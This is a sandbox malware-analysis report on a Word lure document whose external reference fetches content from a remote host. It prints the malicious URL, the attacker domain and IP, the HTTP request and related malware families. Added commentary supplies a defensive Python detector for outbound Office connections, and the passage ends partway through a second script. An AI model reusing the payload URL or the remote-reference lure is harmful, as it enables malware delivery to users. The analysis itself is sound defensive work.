Windows Analysis Report
Untitled_20250325.docx.doc

Overview

General Information

Sample name: Untitled_20250325.docx.doc
Analysis ID: 1647950
MD5: e00b2ef0073a6021cc012dcf5d5ad70c
SHA1: c3dd54e43063122bcb849736ce7fe26ea27344cc
SHA256: f7821649e3f5fdb5cccba8f154ef19d8c59f46ca980059cf20a1d79b2f541bad
Tags: docuser-TeamDreier

Detection

Score: 52
Range: 0 - 100
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Contains an external reference to another file
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 8076 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • cleanup
No configs have been found
No yara matches
Sigma detected: Suspicious Office Outbound Connections | Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49717, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 8076, Protocol: tcp, SourceIp: 162.19.137.157, SourceIsIpv6: false, SourcePort: 443
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-25T12:47:44.471240+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49717 | 162.19.137.157 | 443 | TCP
2025-03-25T12:47:46.006761+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49719 | 162.19.137.157 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-25T12:47:45.563705+0100 | 1810005 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49718 | 162.19.137.157 | 443 | TCP

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 162.19.137.157:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.19.137.157:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: global traffic | DNS query: name: t.emobility.energy
Source: winword.exe | Memory has grown: Private usage: 2MB later: 74MB

Networking

Source: Network traffic | Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.5:49718 -> 162.19.137.157:443
Source: Joe Sandbox View | IP Address: 162.19.137.157
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 162.19.137.157:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 162.19.137.157:443
Source: global traffic | HTTP traffic detected:
    GET /JpXyeF?&achiever HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
    Accept-Encoding: gzip, deflate
    Host: t.emobility.energy
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: t.emobility.energy
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 503 Service Unavailable
    Date: Tue, 25 Mar 2025 11:47:44 GMT
    Server: Apache/2.4.62 (Debian)
    Content-Length: 384
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 503 Service Unavailable
    Date: Tue, 25 Mar 2025 11:47:45 GMT
    Server: Apache/2.4.62 (Debian)
    Content-Length: 384
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 503 Service Unavailable
    Date: Tue, 25 Mar 2025 11:47:46 GMT
    Server: Apache/2.4.62 (Debian)
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 503 Service Unavailable
    Date: Tue, 25 Mar 2025 11:47:47 GMT
    Server: Apache/2.4.62 (Debian)
    Content-Length: 384
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: classification engine | Classification label: mal52.evad.winDOC@2/1@1/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\Desktop\~$titled_20250325.docx.doc
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{638F61A7-B228-44EB-8B6F-4622C65F4A60} - OProcSessId.dat
Source: Untitled_20250325.docx.doc | OLE indicator, Word Document stream: true
Source: Untitled_20250325.docx.doc | OLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: unknown unknown
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Untitled_20250325.docx.doc | Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: Untitled_20250325.docx.doc | Initial sample: OLE zip file path = word/media/image2.emf
Source: Untitled_20250325.docx.doc | Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: Untitled_20250325.docx.doc | Initial sample: OLE summary lastprinted = 2020-10-16 02:53:17
Source: Untitled_20250325.docx.doc | Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Source: settings.xml.rels | Extracted files from sample: https://t.emobility.energy/jpxyef?&achiever
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
MITRE ATT&CK matrix. A number in parentheses is the count of signatures from this analysis mapped to that technique; entries without a number are the matrix's standard grid cells and were not matched.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation (11); Exploitation for Client Execution (3); At; Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (1); Extra Window Memory Injection (1); Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (1); Extra Window Memory Injection (1); Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery (1); Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (2)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Behavior Graph (ID 1647950)
Sample: Untitled_20250325.docx.doc; Start date: 25/03/2025; Architecture: WINDOWS; Score: 52

  • Sample → DNS/IP: t.emobility.energy
  • Sample → DNS/IP: host1.emobility.energy
  • Sample → Signature: Suricata IDS alerts for network traffic
  • Sample → Signature: Contains an external reference to another file
  • Sample → Process: WINWORD.EXE started (graph counters 173 and 109; the graph legend labels these per-process counters as number of created registry values and number of created files)
  • WINWORD.EXE → DNS/IP: host1.emobility.energy, 162.19.137.157, port 443 (local ports 49717, 49718), CENTURYLINK-US-LEGACY-QWESTUS, United States

Antivirus detection (Source | Detection | Scanner | Label)
  • Untitled_20250325.docx.doc | 11% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
URL detection (Source | Detection | Scanner | Label)
  • https://t.emobility.energy/JpXyeF?&achiever | 0% | Avira URL Cloud | safe


Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
  • host1.emobility.energy | 162.19.137.157 | active: true | malicious: false | reputation: high
  • s-0005.dual-s-msedge.net | 52.123.128.14 | active: true | malicious: false | reputation: high
  • t.emobility.energy | IP: unknown | active: unknown | malicious: false | reputation: high

URLs (Name | Malicious | Antivirus Detection | Reputation)
  • https://t.emobility.energy/JpXyeF?&achiever | malicious: true | Avira URL Cloud: safe | reputation: unknown

IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
  • 162.19.137.157 | host1.emobility.energy | United States | 209 | CENTURYLINK-US-LEGACY-QWESTUS | malicious: false
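The network tables above show WINWORD.EXE itself reaching 162.19.137.157:443 (host1.emobility.energy). That pattern, an Office binary initiating a TCP connection to a public address that is not a known Microsoft service endpoint, is the whole of the detection logic behind an "Office outbound connection" rule, and it can be checked directly against endpoint telemetry. The Python below is an added example, not Joe Sandbox code and not a Sigma rule: the events are constructed stand-ins shaped like Sysmon Event ID 3 (network connection) records, the first of them modelled on the connection in this report (WINWORD.EXE, PID 8076, 192.168.2.5:49717 to 162.19.137.157:443), and the allowlist is seeded from the Microsoft addresses the sandbox itself excluded from analysis, which is an assumption for illustration rather than a vetted list.

```python
"""Flag Office processes that initiate outbound connections to non-allowlisted hosts."""
import ipaddress

OFFICE_IMAGES = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe",
}

# Destinations treated as benign Office service traffic. Assumption for this
# example: seeded with addresses the sandbox report excluded from analysis.
# Prefer address/CIDR entries over hostnames (see _is_allowed).
ALLOWED_DEST_NETS = [ipaddress.ip_network(n) for n in (
    "52.123.128.14/32", "52.109.20.38/32", "52.111.251.16/30",
)]
ALLOWED_HOST_SUFFIXES = ("officeapps.live.com", "office.net", "office.com", "microsoft.com")

WINWORD = r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"

# Constructed events in the shape of Sysmon Event ID 3 records (not real logs).
SAMPLE_EVENTS = [
    # Modelled on the report: WINWORD.EXE (PID 8076) -> host1.emobility.energy:443.
    {"EventID": 3, "Image": WINWORD, "ProcessId": 8076, "Initiated": "true", "Protocol": "tcp",
     "SourceIp": "192.168.2.5", "SourcePort": 49717,
     "DestinationIp": "162.19.137.157", "DestinationPort": 443,
     "DestinationHostname": "host1.emobility.energy"},
    # Office configuration endpoint the sandbox excluded from analysis: benign.
    {"EventID": 3, "Image": WINWORD, "ProcessId": 8076, "Initiated": "true", "Protocol": "tcp",
     "SourceIp": "192.168.2.5", "SourcePort": 49720,
     "DestinationIp": "52.123.128.14", "DestinationPort": 443,
     "DestinationHostname": "s-0005.dual-s-msedge.net"},
    # Same destination from a browser: outside this rule's scope.
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ProcessId": 4242, "Initiated": "true", "Protocol": "tcp",
     "SourceIp": "192.168.2.5", "SourcePort": 49730,
     "DestinationIp": "162.19.137.157", "DestinationPort": 443, "DestinationHostname": ""},
    # Word talking to an internal (RFC 1918) file server: ignored by this rule.
    {"EventID": 3, "Image": WINWORD, "ProcessId": 8076, "Initiated": "true", "Protocol": "tcp",
     "SourceIp": "192.168.2.5", "SourcePort": 49731,
     "DestinationIp": "192.168.2.10", "DestinationPort": 445, "DestinationHostname": ""},
]


def _is_allowed(dst: ipaddress._BaseAddress, host: str) -> bool:
    """Address match first; hostname suffix match only as a fallback, because
    DestinationHostname is a reverse lookup whose PTR record the destination owner controls."""
    if any(dst in net for net in ALLOWED_DEST_NETS):
        return True
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in ALLOWED_HOST_SUFFIXES)


def office_outbound_alerts(events: list[dict]) -> list[dict]:
    """Return one alert per outbound connection an Office binary initiated to a
    public, non-allowlisted destination."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 3 or str(ev.get("Initiated", "")).lower() != "true":
            continue
        image = ev.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if image not in OFFICE_IMAGES:
            continue
        dst = ipaddress.ip_address(ev["DestinationIp"])
        if dst.is_private or dst.is_loopback or dst.is_link_local or dst.is_multicast:
            continue
        host = ev.get("DestinationHostname") or ""
        if _is_allowed(dst, host):
            continue
        alerts.append({
            "rule": "office_outbound_connection",
            "image": image,
            "pid": ev.get("ProcessId"),
            "src": f"{ev.get('SourceIp')}:{ev.get('SourcePort')}",
            "dest": f"{dst}:{ev.get('DestinationPort')}",
            "dest_host": host or None,
            "protocol": ev.get("Protocol"),
        })
    return alerts


if __name__ == "__main__":
    for alert in office_outbound_alerts(SAMPLE_EVENTS):
        print(alert)
```

Two caveats apply in production. Hostname allowlisting is weaker than it looks: Sysmon fills DestinationHostname from a reverse lookup, and the PTR record belongs to whoever controls the destination address, so a suffix match on its own can be satisfied by an attacker. And an allowlist copied from a sandbox's exclusion list is a stand-in only; Microsoft publishes its Office service address ranges, and a production rule should be fed from those.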
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1647950
Start date and time: 2025-03-25 12:46:23 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Untitled_20250325.docx.doc
Detection: MAL
Classification: mal52.evad.winDOC@2/1@1/1
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 52.109.20.38, 23.204.23.20, 13.89.179.14, 52.111.251.18, 52.111.251.17, 52.111.251.16, 52.111.251.19, 23.33.42.76, 23.33.42.72, 52.109.6.63, 52.123.128.14, 40.126.24.147, 52.149.20.212, 20.199.58.43, 150.171.27.10
  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, scus-azsc-config.officeapps.live.com, templatesmetadata.office.net.edgekey.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, eus2-azsc-000.roaming.officeapps.live.com, arc.msn.com, osiprod-eus2-buff-azsc-000.eastus2.cloudapp.azure.com, prod-canc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod-na.naturallanguageeditorservice.osi.office.net.akadns.net, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, prod1.naturallanguageeditorservice.osi
  • Not all processes were analyzed; the report is missing behavior information
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
No simulations
Context: IPs (Match; Associated Sample Name / URL | Detection | Threat Name)
Match: 162.19.137.157
  • PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown (3 analyses)
  • BL 248436935 CNTR MRKU9180226.docx.doc | malicious | Unknown (2 analyses)
  • SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsx | malicious | Unknown (3 analyses)
  • CMR ReF 15200477813.docx.doc | malicious | Unknown (2 analyses)

Context: domains (Match; Associated Sample Name / URL | Detection | Threat Name | IP seen in that analysis)
Match: s-0005.dual-s-msedge.net
  • https://1drv.ms/o/s!Aij0JRNQrbnneSfOXvmQkoge4b0?e=GSyDcy | malicious | Unknown | 52.123.129.14
  • FILLING SUMMON DOCUMENT.docx | malicious | HTMLPhisher | 52.123.128.14
  • Legal_Notice_Presentation.pptx | malicious | HTMLPhisher | 52.123.129.14
  • CMR%20ReF%2015200477813.docx | malicious | Unknown | 52.123.129.14
  • PO#45028.xlam.xlsx | malicious | Unknown | 52.123.128.14 (2 analyses)
  • Nuevo comando_BR WJO-3-24-2025.xlam.xlsx | malicious | Unknown | 52.123.128.14 (2 analyses)
  • New Order.docx | malicious | Unknown | 52.123.128.14
  • PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 52.123.129.14
  This domain is a Microsoft endpoint and its address 52.123.128.14 is on the IP exclusion list above; any Office document opened in the sandbox contacts it, so the overlap with other malicious submissions carries no indicator value.
Match: host1.emobility.energy
  • PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 162.19.137.157 (3 analyses)
  • BL 248436935 CNTR MRKU9180226.docx.doc | malicious | Unknown | 162.19.137.157 (2 analyses)
  • SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsx | malicious | Unknown | 162.19.137.157 (3 analyses)
  • CMR ReF 15200477813.docx.doc | malicious | Unknown | 162.19.137.157 (2 analyses)

Context: ASNs (Match; Associated Sample Name / URL | Detection | Threat Name | IP seen in that analysis)
Match: CENTURYLINK-US-LEGACY-QWESTUS
  • PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 162.19.137.157 (3 analyses)
  • BL 248436935 CNTR MRKU9180226.docx.doc | malicious | Unknown | 162.19.137.157 (2 analyses)
  • SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsx | malicious | Unknown | 162.19.137.157 (3 analyses)
  • https://tinyurl.com/SA-Recycling | malicious | Unknown | 162.19.138.82
  • CMR ReF 15200477813.docx.doc | malicious | Unknown | 162.19.137.157

Context: JA3 fingerprints (Match; Associated Sample Name / URL | Detection | Threat Name | IP; every row below is malicious and lists 162.19.137.157)
Match: a0e9f5d64349fb13191bc781f81f42e1
  • 750413b4e6897a671bc759e04597952a0be747830189873b.bin.exe | LummaC Stealer
  • Qyk8RJnGN7.exe | LummaC Stealer
  • h2H2R15NDO.exe | LummaC Stealer (2 analyses)
  • m3gyyctL5A.exe | LummaC Stealer
  • PO#45028.xlam.xlsx | Unknown
  • Nuevo comando_BR WJO-3-24-2025.xlam.xlsx | Unknown
  • PURCHASE ORDER 5172025.xla.xlsx | Unknown (2 analyses)
  • BL 248436935 CNTR MRKU9180226.docx.doc | Unknown
  • ysxekL7sOS.exe | LummaC
  • 37f463bf4616ecd445d4a1937da06e19NITECH_42613SIVECORZ422FMILO202510161528.cmd | Remcos, GuLoader
  • Request for Quotation-RFQ20250324.exe | Snake Keylogger
  • Niceevenbettergirllikeabuttersmoothkissforme.hta | Remcos
  • goodisthebestthingsbetterwaytotellhimbestfor.hta | Remcos
  • SAMWHA #AWB000033065_25-03-25_000177817890 .vbs | GuLoader
  • dukas.js | Remcos
  • newwelcomedrinkforentireteammemebers.hta | Remcos
  • Sars_Refund_Statue.js | Unknown
  • awb_fedex_documents_delivery_25_03_2025_0000000000000_doc.bat | GuLoader
  A JA3 hash fingerprints the TLS client implementation, here the Windows TLS stack that WINWORD.EXE uses, not the server or the payload. It is therefore shared by unrelated Windows malware and by legitimate software alike, which is why stealers, RATs and Office lures all appear above; the overlap supports the low-severity signature but does not by itself tie this sample to those families.
                            No context
Dropped file
Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 4.767813297648116
Encrypted: false
SSDEEP: 3:klt+lllOTh8f/kHyr6f+qIUrXt59dWkJ+kleYhRlU:7tOysY8IOqq+ARlU
MD5: 808EDCBFBFF9395AD432F699894BACA5
SHA1: D2B9238950D509B2B325EC5C5DE9157462BE948A
SHA-256: DF909EF652A1D9785AED3C6835C4ABDD27FDB30A3B0954D716E8CDC7819F9574
SHA-512: B77315113E187B6B9C1D9CE0A1B78EC9519B57E435E938CC38891B0988ED23794FA4DECF1F4E01E83E7A938C96A769534637A014A1479553E03DA251E58D47C1
Malicious: false
Reputation: low
Preview: .user.................................................a.l.f.o.n.s...+v.....z.....N_...e.2.......P(C%..{.slN..p..\Xx38rk..G#{.........[..%u.}..j......t..=.i
Note: a 162-byte file written by WINWORD.EXE that holds a user name in ANSI and again in UTF-16 matches the layout of Word's owner (lock) file, ~$<document name>, which Word creates for every open document; it is a side effect of opening the sample, not payload.
File type: Microsoft Word 2007+
Entropy (8bit): 7.9642952408861385
TrID:
  • Word Microsoft Office Open XML Format document (49504/1) 58.23%
  • Word Microsoft Office Open XML Format document (27504/1) 32.35%
  • ZIP compressed archive (8000/1) 9.41%
File name: Untitled_20250325.docx.doc
File size: 56'028 bytes
MD5: e00b2ef0073a6021cc012dcf5d5ad70c
SHA1: c3dd54e43063122bcb849736ce7fe26ea27344cc
SHA256: f7821649e3f5fdb5cccba8f154ef19d8c59f46ca980059cf20a1d79b2f541bad
SHA512: 701026b070af6ec9a38fc0dd3ba6a0005938e9882c2d25a4b64c4726da669ff8fc1deb488c88a8c245b40bcefde79966b3c87118443e99e2f7e53f3a57ba4e1a
SSDEEP: 768:gOkYQoBauvMybG2FVChvBC78itcNjhxIqSSooFEl1Yt9Nxk/EW7hwTP9VAnCA9EQ:gvTolVChJIcphxpS1ubyZS38xu2apxs
TLSH: EB43E06BDC514C0BEB0C07F9FB85391EB670F7A3125321235E103D6E8EAA5CD4626E69
File Content Preview: PK........RLyZ+..0............[Content_Types].xmlUT....x.g.x.g.x.g.V.j.@.}/.....i..J)....c.h.....%.7v&......SL".../.bu.3s4hu.;[<A...Z,..(..`:.....o.GQ )o...j.......V...X0.c-Z..IJ.-8.U......)....Q..j..z.. u...J..b....Rg..S..+.:.9$#.......N...\.....vZ...O..
Icon Hash: 35e1cc889a8a8599
Document Type: OpenXML
Number of OLE Files: 1
Has Summary Info:
Application Name:
Encrypted Document: False
Contains Word Document Stream: True
Contains Workbook/Book Stream: False
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream: False
Flash Objects Count: 0
Contains VBA Macros: False
Code Page: -535
Title:
Subject:
Author: 91974
Keywords:
Template: Normal.dotm
Last Saved By: 91974
Revision Number: 2
Total Edit Time: 1
Last Printed: 2020-10-16 02:53:17
Create Time: 2025-03-21T06:52:00Z
Last Saved Time: 2025-03-21T06:53:00Z
Number of Pages: 1
Number of Words: 0
Number of Characters: 0
Thumbnail: WMF/EMF metafile preview of the embedded worksheet (binary dump omitted). Text recoverable from its records: font names Verdana, Times New Roman and a CJK font whose UTF-16 name survives as the bytes "[SO" with charset suffix "_GB2312" (consistent with SimSun, 宋体); the strings "TEL: 0086-512-82558856 FAX: 0086-512-58268319", "JIANGSU SOIPOI CO.,LTD" and "DELIVERY ORDER".
Creating Application: Microsoft Office Word
Security: 0
Document Code Page: 1252
Presentation Target Format:
Number of Lines: 1
Number of Paragraphs: 1
Number of Slides: 0
Number of Pages with Notes: 0
Number of Hidden Slides: 0
Number of Sound/Video Clips: 0
Thumbnail Scaling Desired: false
Company: Grizli777
Contains Dirty Links: false
Shared Document: false
Changed Hyperlinks: false
Application Version: 12.0000
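The static overview above describes an OpenXML document with no VBA and a single embedded OLE file, and the URL table records https://t.emobility.energy/JpXyeF?&achiever as the only URL of the analysis. In OOXML a reference to something outside the package is a relationship with TargetMode="External" in one of the .rels parts, and Word resolves every such target except plain hyperlinks while the document is being opened or rendered, which is how opening a file becomes outbound traffic. The Python below is an added example, not Joe Sandbox code and not extracted from the sample: it enumerates those relationships in a .docx, and the document it scans is constructed in memory to mirror the report's finding. The report does not say which relationship type carries the external target, so placing it on an oleObject relationship is an assumption made here.

```python
"""Enumerate external references in an OOXML (.docx) package."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
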